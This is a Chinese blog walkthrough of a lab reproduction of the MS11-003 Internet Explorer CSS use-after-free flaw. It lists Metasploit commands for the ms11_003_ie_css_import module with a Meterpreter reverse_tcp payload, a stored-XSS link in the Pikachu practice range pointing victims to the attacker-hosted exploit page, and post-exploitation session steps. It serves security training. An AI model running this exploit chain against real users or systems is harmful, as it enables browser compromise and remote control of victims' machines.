ms11-003漏洞复现:原理详解+渗透实践(CVE-2010-3971, CVE-2011-0035)

原创 于 2025-11-12 18:08:20 发布 · 1.1k 阅读 · 15 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#MS11-003漏洞 #Metasploit #CVE-2010-3971 #CVE-2011-0035

目录

一、ms11-003漏洞

(一)MS11-003 简介

(二)影响版本

(三)核心原理

二、MSF

(一)MSF简介

(二)渗透流程

三、渗透实战

(一)渗透环境

(二)攻击者配置MSF

1、启动MSF

2、查找ms11-003

3、选择攻击模块

4、配置攻击信息

(三)攻击者配置XSS

(四)受害者点击XSS

1、访问pikachu靶场存储型XSS页面

2、点击Click to Download

(五)攻击机渗透成功

(六)后渗透

1、进入会话

2. 获取用户id

3、显示靶机系统信息

4、查看ip地址

本文介绍了利用MS11-003漏洞结合Metasploit框架进行渗透测试的实战过程。MS11-003是2011年微软紧急发布的IE浏览器远程代码执行漏洞,主要影响IE6-8版本。攻击者通过构造恶意CSS文件触发"释放后使用"漏洞执行任意代码。实验使用Kali作为攻击机(192.168.59.137),Windows Server 2008 R2作为靶机(192.168.59.130)。通过Metasploit配置ms11_003_ie_css_import模块生成恶意链接,在Pikachu靶场存储型XSS页面植入该链接。当靶机用户点击链接后,成功建立Meterpreter会话,实现系统信息获取等后渗透操作。实验验证了老旧系统未打补丁的安全风险及XSS与漏洞利用结合的危害性。

一、ms11-003漏洞

(一)MS11-003 简介

MS11-003 是微软于 2011年2月 发布的一个紧急(Out-of-Band) 安全公告,旨在修复 Microsoft Internet Explorer 浏览器中存在的两个远程代码执行漏洞。由于其危害性高且当时已出现公开的攻击概念代码,微软打破了每月定期发布的惯例,紧急推出了该补丁。

项目内容
官方名称Internet Explorer 的累积性安全更新
发布日期2011年2月(紧急发布)
严重等级严重
影响产品Internet Explorer 6, 7, 8
影响系统Windows XP, Server 2003, Vista, Server 2008, 7
修复漏洞CVE-2010-3971, CVE-2011-0035
补丁编号KB2482017

(二)影响版本

此漏洞主要影响较旧版本的Windows操作系统和IE浏览器:

  • Internet Explorer 6

  • Internet Explorer 7

  • Internet Explorer 8

这些版本的IE运行于以下系统:

  • Windows XP

  • Windows Server 2003

  • Windows Vista

  • Windows Server 2008

  • Windows 7

  • Windows Server 2008 R2

(三)核心原理

MS11-003 漏洞的核心原理是 Internet Explorer 浏览器在处理递归导入的CSS文件时,存在一个“释放后使用”漏洞。攻击者可以构造一个特殊的网页,诱使IE错误地释放一个仍在使用的内存对象,随后再重新利用这块已被释放的内存来执行任意代码。通俗地讲,这就像是IE浏览器在管理内存时犯了一个错误:

  • 它告诉系统:“这块内存我不用了,你可以回收了”(释放)。

  • 但之后不久,它又试图去使用这块已经被回收的内存(使用)。

  • 攻击者巧妙地在这个空当里,往这块内存里塞进了自己的恶意代码。

  • 当IE再次使用这块内存时,实际上执行的是攻击者的代码

二、MSF

(一)MSF简介

Metasploit Framework (MSF) 是一个世界领先的、开源的渗透测试平台。它提供了一套强大的工具集,让安全专业人员能够开发、测试和执行针对已知漏洞的利用代码(Exploits)。Metasploit Framework 由多个功能模块组成,具体如下所示。

模块类型中文名作用描述
Exploit漏洞利用这是MSF的核心。它是包含攻击代码的模块,利用特定软件或系统中的已知漏洞
Payload攻击载荷在成功利用漏洞后,真正在目标系统上执行的代码。比如提供一个远程命令行 shell 或者一个 Meterpreter 会话。
Auxiliary辅助模块执行各种辅助功能的模块,不直接在目标上执行代码。例如:扫描、指纹识别、密码爆破、漏洞扫描等。
Encoder编码器对 Payload 进行编码,目的是绕过杀毒软件的静态检测。
NOP空指令生成器生成空操作指令,用于在内存中平滑执行流程,提高 exploit 的可靠性。

(二)渗透流程

  • 信息收集 (Reconnaissance):使用 Auxiliary 模块进行端口扫描、服务版本探测等,寻找潜在的攻击入口。

  • 选择并配置 Exploit:根据发现的漏洞,选择合适的 Exploit 模块。并设置必要选项,如目标地址 (RHOST)、目标端口 (RPORT)。

  • 选择并配置 Payload:选择你希望在目标系统上执行的 Payload。并设置其选项,例如:你的监听IP (LHOST) 和端口 (LPORT)。(这是 reverse_tcp payload 所必需的)。

  • 规避检测 (可选):使用 Encoder 对 Payload 进行编码,以尝试绕过杀毒软件。

  • 执行攻击:运行 exploit或run 命令。

  • 后期渗透:如果攻击成功,你将获得一个会话(例如一个 Meterpreter shell)。在此阶段,你可以进行权限提升、横向移动、数据提取等各种操作。

三、渗透实战

(一)渗透环境

靶机使用windows server2008 R2环境,其中靶机、攻击机Kali处于同一网段(均使用Vmnet8网卡),做实验前需要确保kali和靶机是可以互相联通的。本文的渗透环境角色分配如下所示。

角色IP地址/URL说明
攻击机 (Kali)192.168.59.137攻击机Kali,运行Metasploit等渗透测试工具。
靶机192.168.59.130您要攻击测试的目标机器(例如:一台存在漏洞的Windows虚拟机)。
Pikachu靶场网关192.168.59.1Pikachu靶场所在服务器或虚拟机的网关地址。
Pikachu靶场存储型XSS漏洞页面http://127.0.0.1/pikachu/vul/xss/xss_stored.php注意:此URL是从靶机(192.168.59.130)本机访问的地址。

(二)攻击者配置MSF

1、启动MSF

攻击机使用msconsole启动MSF模块

msfconsole

2、查找ms11-003

MS11-003 是微软在2011年发布的一个紧急安全更新编号,用于修复IE浏览器中可导致电脑被远程控制的高危漏洞名称,

search ms11-003

执行 search ms11-003 命令,Metasploit 返回了与之匹配的模块。结果显示只有一个 exploit 模块:exploit/windows/browser/ms11_003_ie_css_import

3、选择攻击模块

进入ms11_003漏洞渗透模块,并展示配置选项。

use 0
show options

使用 use 0 命令选择了该模块。Metasploit 自动配置了默认的Payload(攻击载荷):windows/meterpreter/reverse_tcp。这是一个反向TCP连接的Meterpreter shell,成功后会回连到您的攻击机。

4、配置攻击信息

配置服务相关信息并开启渗透(此时ip地址填写的是攻击机的ip地址)

set SRVHOST 192.168.59.137
set URIPATH ljn
run

  • set SRVHOST 192.168.59.137: 您将服务端主机地址设置为您Kali攻击机的IP地址。这是用来托管恶意网页的服务器地址。

  • set URIPATH ljn: 您将访问的URI路径设置为 ljn。这意味着恶意URL将是 http://192.168.59.137:8080/ljn

运行结果如下所示,复制下来链接http://192.168.59.137:8080/ljn后续构造XSS Payload时会用到。

使用 run 命令启动攻击模块。Metasploit 将其作为后台作业运行,从输出信息可以看到:

  • [*] Started reverse TCP handler on 192.168.59.137:4444: 在4444端口启动了反向TCP监听器,等待目标系统上线(即中招后回连到这个端口)。

  • [*] Using URL: http://192.168.59.137:8080/ljn: 成功创建了恶意网址。

  • [*] Server started.: 攻击服务器已经启动并运行。

(三)攻击者配置XSS

在pikachu靶场的存储型XSS中,注入如下语句。

<a href="http://192.168.59.137:8080/ljn">Click to download</a>

该XSS语句含义是创建了一个文本为“Click to download”(点击下载)的网页链接。指向地址:当用户点击这个链接时,他们的网页浏览器会尝试访问 http://192.168.59.137:8080/ljn 这个URL。

插入后效果如下所示,多了一个Click to Download的下载链接。

(四)受害者点击XSS

1、访问pikachu靶场存储型XSS页面

在靶机(windows server2008)中使用ie访问存储型XSS页面,如下所示。

http://192.168.59.1/pikachu/vul/xss/xss_stored.php

2、点击Click to Download

(五)攻击机渗透成功

此时回到kali攻击机查看攻击效果,如下所示靶机192.168.59.130与攻击机192.168.59.137成功建立shell连接。

回到Metasploit命令行,使用 sessions  sessions -l 命令查看是否建立了新的会话,如下所示。

备注:这里共有两个,因为我刚刚click2

(六)后渗透

1、进入会话

使用 sessions -i <会话ID>(例如 sessions -i 1)来交互并控制目标机器

备注:这里我选择第2个,大家根据实际情况任选一个即可,主要是要选存在的id

2. 获取用户id

3、显示靶机系统信息

4、查看ip地址

Windows2008使用-解决漏洞-CVE-2010-3972
mystonelxj的博客
12-25 1268
对于一些企业而言,其自建的应用系统一般不会频繁调整,但是需要及时对其应用的操作系统做安全加固,以避免不必要的系统宕机或者数据泄露问题。如果操作系统未做及时升级,后期做安全加固就可能会遇到不必要的麻烦,本文讲述了近期对windows2008Server做CVE-2010-2730漏洞加固的一些处理过程。主要探讨常规处理方式以及非常规模式。事实验证,对于系统的漏洞,如有可能,及时更新是有必要,否则就会导致不必要的麻烦。
MS11-003在Internet Explorer中存在允许远程代码执行漏洞复现
sGanYu
11-14 3113
漏洞描述 利用IE(包含IE6、IE7、IE8)对CSS的解析存在的一个问题,使得任何访问包含非法CSS的页面导致IE奔溃重启,也就是说攻击者只需让用户访问一个特制的网页或者加载了一个非法的CSS的网页时,便可以获得与本地用户相同的权限 受影响的系统 Windows XP SP 2 Windows XP SP 3 Windows Vista SP 1 Windows Vista SP 2 Windows Server 2008 Windows Se
Microsoft Windows MHTML脚本代码注入漏洞 (MS11-026) (CVE-2011-0096)
LiBai'S BLOG
08-15 7319
漏洞测试 详细描述 Microsoft Windows是微软发布的非常流行的操作系统。 Microsoft Windows使用MHTML时存在安全漏洞,远程攻击者可利用此漏洞将任意脚本代码注入到当前浏览器会话,获取敏感信息,欺骗内容或在目标网站执行任意操作。 此漏洞源于MHTML解释MIME格式请求文档中内容块的方式。在某些情况下,此漏洞可能会允许攻击者在运行在受害者IE中的Web请求的响应中注入客户端脚本。该脚本可欺骗内容、泄露信息或以目标用户身份在受影响站点进行攻击。 解决办法 服务器端过滤参数中的
kail利用msf工具对ms11-003漏洞入侵渗透Win7
qq_50854662的博客
05-26 2433
前言: windows7IE溢出攻击 实验环境: 工具:metasploit 靶机两台:windows 7和kali2020 攻击机IP地址:10.20.29.129 被攻击机IP地址:10.20.29.134 步骤: 1、在kali里面打开metasploit漏洞利用框架 2、搜索ms11-003漏洞利用模块 3、使用利用模块use exploit/windows/browser/ms11_003_ie_css_import 4、设置payload set pay...
E028-操作系统漏洞验证及加固-MS11_003漏洞利用与安全加固
轻舟已过万重山
10-14 457
中级。
Microsoft Windows MHTML脚本代码注入漏洞 (MS11-026) (CVE-2011-0096)_mhtml脚本代码注入漏洞解决
2401_84302628的博客
05-17 768
对于从来没有接触过网络安全的同学,我们帮你准备了详细的学习成长路线图。可以说是最科学最系统的学习路线,大家跟着这个大的方向学习准没问题。对于从来没有接触过网络安全的同学,我们帮你准备了详细的学习成长路线图。可以说是最科学最系统的学习路线,大家跟着这个大的方向学习准没问题。,朋友们如果有需要全套《网络安全入门+黑客进阶学习资源包》,可以扫描下方二维码领取(如遇扫码问题,可以在评论区留言领取哦)~Microsoft Windows是微软发布的非常流行的操作系统。因篇幅有限,仅展示部分资料。
ms11_003(漏洞复现)
qq_46258964的博客
11-20 2792
你我的一样,终将被遗忘 《郭源潮》 漏洞简介, ms11-003(windows7IE溢出攻击) 是利用IE8中对css的解析存在一个问题,导致任何访问包含非法css的页面将导致IE8崩溃重启的漏洞。当然ie浏览器还要很多漏洞ms14_068,但它们利用方式的差不多。 在nessud漏洞扫描工具中ms11_003漏洞排分可是10分,最高的一个等级,像ms17_010和cve_2019_0796这些漏洞的没有10分,想必是该漏洞没有什么能阻挡的吧 攻击步骤 攻击机—
小白日记24:kali渗透测试之提权(四)--利用漏洞提权
ZiXuanFY的博客
10-09 5907
利用漏洞提权实例 前提:已渗透进一个XP或2003系统 一、实验目标漏洞Ms11-080 补丁:Kb2592799 漏洞信息:https://technet.microsoft.com/library/security/ms11-080 1、通过searchsploit命令查找漏洞 【注:查找漏洞的命令行窗口要能完全显示Tit
IE浏览器攻击:MS11-003_IE_CSS_IMPORT
shelter1234567的博客
09-02 949
MS11-003_IE_CSS_IMPORT是指Microsoft Security Bulletin MS11-003中的一个安全漏洞,影响Internet Explorer(IE)浏览器。这个漏洞允许攻击者通过在CSS文件中使用@import规则来加载外部CSS文件,并且绕过浏览器的同源策略。攻击者可以利用这个漏洞进行跨站脚本攻击(XSS)或CSS历史记录窃取等恶意行为。这个漏洞的成因是IE浏览器在处理CSS文件时没有正确地检查和限制@import规则中的URL。
MS11-049:Microsoft XML Editor 信息泄露漏洞(2543893)(CVE-2011-1280)
02-09
远程主机上的应用程序存在信息泄露漏洞。当解析特别构建的 Web Service Discovery (.disco) 文件时,外部 XML 实体可接受不受信任的用户输入。远程攻击者可通过诱骗用户打开特别构建的 .disco 文件来利用此问题,...
MS11_080.zip_MS11-080_MS11_080_ms11_ms11-011_ms11080.exe
09-14
080.zip_MS11-080_MS11_080_ms11_ms11-011_ms11080.exe"涉及的是微软在2011年发布的一个关键安全更新,解决了一个名为“Windows Kernel Use After Free”(Windows内核释放后使用)的严重漏洞,该漏洞被标识为MS11-...
MS11-046 ms11-080 提权exploit
12-02
标题中的“MS11-046”和“ms11-080”是微软安全公告的编号,这些编号通常用于标识特定的安全更新或漏洞。在这个案例中,这两个编号分别对应于两个不同的本地提权漏洞。让我们深入探讨这两个漏洞以及它们的exploit...
本地模型部署指南[可运行源码]
11-23
本文详细介绍了如何访问和配置本地已部署的模型。首先,用户需要访问指定网址下载并安装chatbox软件。安装完成后,初次进入时需要选择使用自己的模型选项。接着,进入设置界面,选择模型提供方为ollama api,并输入相应的域名(如http://xxxxx:11434),其他设置保持默认,最后点击保存即可完成配置。配置完成后,用户可以选择并使用模型。整个过程简单明了,适合需要本地部署模型的用户参考。
基于ssm框架实现的网上商城.zip
11-23
基于ssm框架实现的网上商城.zip
JDK安装与环境配置[项目代码]
最新发布
11-23
本文详细介绍了JDK的安装和环境变量配置的全过程。首先,从JDK官网下载安装包,然后按照步骤进行安装,默认安装路径为C:Program FilesJavajdk-17。接着,重点讲解了如何配置环境变量,包括新建JAVA_HOME变量和修改Path变量,以便在任意路径下执行Java程序。最后,通过cmd命令验证JDK是否安装成功。此外,文章还附带了一份Python学习资料的推广内容,包括学习路线、视频、书籍、工具包、实战案例和面试题等资源。
C++类和对象基础[项目代码]
11-23
本文详细介绍了C++中类和对象的基础知识,包括面向对象与面向过程的区别、类的定义与访问限定符、封装的概念、类的作用域、实例化过程以及类对象模型的计算方法。文章还深入探讨了this指针的作用和特性,通过实例代码解释了this指针在成员函数中的使用方式及其重要性。此外,文中还涉及了结构体内存对齐规则和空类大小的特殊情况,为读者提供了全面的C++类和对象入门指导。
Windows安装Scrapy指南[项目代码]
11-23
本文详细介绍了在Windows系统下使用Anaconda安装Scrapy的方法,解决了pip无法直接安装Scrapy的问题。Anaconda是一个专注于数据分析的Python发行版本,内置了conda包管理系统,能够方便地管理工具包和虚拟环境。文章解释了Anaconda和conda的概念,并列举了Anaconda的优点,如省时省心、自动处理依赖关系、支持多环境隔离等。此外,还提供了Anaconda的下载链接和安装步骤,最后指导用户通过conda命令安装Scrapy。
基于Bloch方程的磁共振成像序列模拟器Matlab实现
11-23
本资源提供MATLAB多个发行版本(2014、2019a、2021a)的技术支持,配套完整案例数据集及可直接执行的程序文件。程序架构采用模块化设计理念,具备以下技术特征:通过参数配置实现核心算法调整,逻辑结构层次分明,关键代码段配有详细注释说明。 该资源适用于高等院校计算机科学、电子信息技术、应用数学等专业的课程实践、综合课题研究及学位论文开发。内容涵盖智能优化计算、神经网络预测建模、数字信号处理、元胞自动机仿真等典型实验场景,所有案例均通过标准化测试验证。 开发团队由具备十年以上工业级算法研发经验的高级工程师组成,专注于MATLAB科学计算与系统仿真领域。本资源提供经过学术机构验证的完整仿真案例库,适用于教学演示与科研实验。 资源来源于网络分享,仅用于学习交流使用,请勿用于商业,如有侵权请联系我删除!
【嵌入式通信】基于STM32与RS-232的自定义串口助手设计:实现上下位机可靠通信及数据监控
11-23
内容概要:本文详细介绍了一个基于STM32与PC上位机通过RS-232串口通信的完整系统设计与实现,涵盖硬件电路搭建、STM32固件开发、自定义应用层通信协议设计、PC端串口助手软件开发(C# WinForms)、协议解析、数据记录、通信测试及系统部署等内容。系统采用分层协议架构,支持命令控制、数据传输、CRC校验、状态指示和日志记录等功能,并提供了完整的故障排查与扩展开发指南。; 适合人群:具备嵌入式开发基础的电子工程师、自动化控制技术人员、计算机或电子信息类专业学生,以及对串口通信、STM32开发和上位机软件设计感兴趣的开发者;尤其适合从事工业控制、设备调试和物联网通信项目研发的技术人员。; 使用场景及目标:①实现STM32与PC之间的可靠串口通信;②开发具备协议解析能力的自定义串口助手;③应用于设备监控、数据采集、实验室仪器通信等场景;④作为教学案例帮助理解串口通信协议栈的设计与实现。; 阅读建议:建议结合硬件平台动手实践,重点关注通信协议的设计与CRC校验一致性,注意STM32端与PC端代码的协同调试,同时可利用提供的测试模块验证系统稳定性,便于后续功能扩展与二次开发。
评论
成就一亿技术人!
拼手气红包6.0元
还能输入1000个字符
 
红包 添加红包
表情包 插入表情
表情包 代码片
 条评论被折叠 查看
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

mooyuan天天

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值